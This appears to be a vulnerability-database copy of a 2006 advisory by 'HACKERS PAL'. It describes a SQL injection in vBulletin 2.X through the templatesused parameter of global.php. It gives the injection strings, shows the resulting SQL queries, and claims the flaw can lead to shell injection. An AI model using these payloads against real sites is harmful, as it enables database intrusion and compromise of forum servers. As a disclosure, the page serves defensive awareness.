Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14442
HistorySep 27, 2006 - 12:00 a.m.

Vbulletin 2.X sql injection

2006-09-2700:00:00
vulners.com
40
JSON

Hello,

Vbulletin 2.X sql injection

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

This is sql injection in vbulletin systems

the injection is in the global.php file

we can use it

global.php?templatesused=))/*

the query will be
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid

It Can be used as shell injection

Tested on VB 2.3.X and other versions are injected …(2.X)

#WwW.SoQoR.NeT

JSON